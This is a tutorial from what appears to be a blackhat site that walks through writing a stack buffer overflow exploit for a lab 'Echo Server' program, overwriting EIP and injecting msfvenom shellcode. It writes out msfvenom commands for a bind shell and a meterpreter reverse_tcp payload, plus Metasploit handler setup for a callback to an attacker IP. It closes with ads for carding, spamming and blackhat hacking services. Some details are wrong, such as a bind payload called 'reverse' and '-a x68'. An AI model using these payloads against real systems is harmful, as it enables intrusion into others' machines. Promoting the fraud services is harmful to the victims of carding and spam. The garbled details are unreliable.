In this article we will go through Writing reverse TCP exploit.
Introduction[Writing reverse TCP exploit]:
In the previous article, we analyzed the Echo Server program in which we understood things like Remote program crash by manipulating input using tools, Identifying overwritten memory location, etc. Below are some notable points from the previous article that will be used in this article.
Server The program crashed after entering 2000 characters as in the input.
The EIP override position is the 8-byte data after input 1036.
Note: Kindly read the previous articles as this article builds on them.
We assume that readers have sufficient knowledge of how to crash the echo server program and to identify the position of the return address by manipulating user input using special scripts. In this buffer overflow article, we will develop and work on an exploit for Echo Server. Now let’s continue.
So run our python script again on computer B and the output on computer A follows.
In the screenshot above, we can see that the EIP is overwritten by 42424242 (B in hex) and the top of the stack is held at 43434343 (C in hex). So for better understanding let’s make some changes in the python script. From now on our python script follows.
Now we add 4 more C’s after the B’s and then some D’s in the python script. After making these changes, the script will look like the one below.
After saving the script, restart the Echo-Server program which is running with debugger in Machine A. We could do the same by pressing CTRL+F2. Now, after running the above python script we can see that the server program is again crashed which can be seen in the screenshot given below.
When we closely look into the debugger, we notice the following things.
- EIP is pointing 42424242 which is our B’s
- Top of Stack is holding the value 43434343 which is our C’s
- After that, we can see there are multiple 44444444 values in the stack that are filled by the user input.
We can see the same in the following screenshot.
As we have already seen in previous articles that if we change the position of the EIP in memory, we can actually change the way the program executes. So let’s change the value of the EIP register to address C. The address of C (43434343) in memory is 0022F730. We can see the same in the above screenshot. Now we will need to replace B with 0022F730 in the python script we created on machine B. However; it’s a bit tricky to write the memory address in the user input. We know that the stack works with the Last-in-First-Out rule, so we will have to write the address in reverse order. So address C would be
Now in the python script we will replace B with this address. After making the above change in the script, the python script will look like this.
In the above screenshot you can see that we have replaced B with the address of C, now we will create a breakpoint on the RETN instruction in machine A to analyze things better. (We have already explained the basics like what a breakpoint is, how we create breakpoints and what a RETN instruction is, etc. in previous articles, so we will not explain it here.)
As shown in the above screenshot, we have created the breakpoint in the debugger. Now, we will run the program in debugger, and run the python script on the machine B and we will see the following output on the machine A.
As can be seen in the above screenshot that the program execution has reached to the RETN instruction where we had created the breakpoint in previous steps. But if we closely look into the debugger we can see some interesting things which can be seen in following screen shot.
In the above screenshot, we can see the instant of B’s Stack is overwritten by the C’ address which is just the very next instruction address in the stack and holding the value C’s. Now, when we do Step Into in the debugger by pressing the F7 key we can see that the program execution control has switched to the next instruction and now top of the stack is showing the value 43434343, which is the value of C in Hexadecimal. We can see the same in following screenshot.
Until now, we have successfully overwritten the EIP value by changing the user input and control the execution of the program.
Now, we will put some special type of code in the user input so that we can do some more interesting things. This special type of code is called the Shell Code.
Related article:Amazone carding 2023 method
Shell Code is a piece of code that is directly executed by the computer. Shellcodes generally do not require any compilation process before execution, thus shellcode is machine independent. We can create the shell code ourselves or we can use other tools to generate the shell code.
Generation of TCP reverse payload
In this exploit writing series, we will use the Metasploit tool that is available by default in the Kali Linux Machine to generate our shellcode.
We will use a tool called “Msfvenom” to generate the shellcode. We can generate the shellcode by running the following command. Here we are using a TCP reverse connection shellcode that will open port 4444 on the server. (There are several shellcodes or payloads available that can be used as required.)
msfvenom -p windows/shell_bind_tcp -f c -a x68
Setting up the payload with the exploit
It can be seen in the above screenshot that our payload is successfully generated. Now, we will copy the exploit code and replace the D’s in the python script with this code. After these changes, the python script will look like this.
Now, after saving this python script, we will restart the debugger in machine A and run the python script again in machine B.
As we can see in the above screenshot, the server program is again reached to the RETN instruction, now, we continue the program by hitting the F9 key.
Exploit execution and getting the reverse shell
We can see in the above screen shot, after continuing the execution, the Echo Server program does not crash as per the previous cases. This would be great news for us.
The shell code, which we have inserted by the user input, is executing in the computer memory that is the reason, program does not crashed. So, now let’s try to connect with NetCut on 4444 port by the machine B.
As can be seen in the above screenshot, we have successfully exploited the Echo Server EXE program and got the command shell. Now, let’s run the Echo Server program without the debugger on machine A and launch the python script to verify the same.
As shown in the screenshot above, we started the Echo Server program on computer A and ran the python script on computer B, but the server program did not crash. When we hit the NetCut tool on port 4444, we successfully obtained a TCP connection on the attacking computer B.
Generating meter payload settings
So we have successfully created a Reverse TCP exploit for Echo Server. Now we will inject another payload into the exploit that will give us the meterpreter shell.
First, we’ll need to create the shellcode for the payload; we can do the same by executing the following command in terminal.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.84 -f c -a x86
In this command we have used an IP address which is the IP address of the kali Linux machine where the reverse connection will occur when we send our exploit.
Our small payload is ready; now replace the payload in the python script with the previous one. We will also have to prepare the Metasploit console to accept the reverse connection.
So let’s start the Metasploit in the attacker machine which is machine B and run the following command to launch the Metasploit.
It will take some time to start, after the Metasploit starts we can see the following screen.
Now, run the following command to setup the handler.
- Use exploit/multi/handler
After that hit another command
- set PAYLOAD windows/meterpreter/reverse_tcp
After this, we will have to set the Host IP address (It is the Kali Linux Machine IP Address), the command for the same is following.
- set LHOST 192.168.1.84
Now, we need to hit another command
We can see all these commands in the following screenshot.
Exploitation with meterpreter
Now, everything is set from the attacker’s side on machine B. So, we will run the Echo Server program on the machine A and the python script on machine B and verify whether we get the reverse connection or not.
As can be seen in the above screenshot, we got the reverse connection from the victim machine. That is a great news for us.
We have understood the following things by completing this exercise:
- Creating the Shell Code with the help of Metasploit
- Writing Reverse TCP exploit for Echo Server Application
- Exploiting the Application with Different Payload
All About Carding, Spamming , And Blackhat hacking contact now on telegram : @blackhatpakistan_Admin
Subscribe to our Youtube Channel Blackhat Pakistan. check our latest spamming course 2023 Learn from BLACKHATPAKISTAN and get master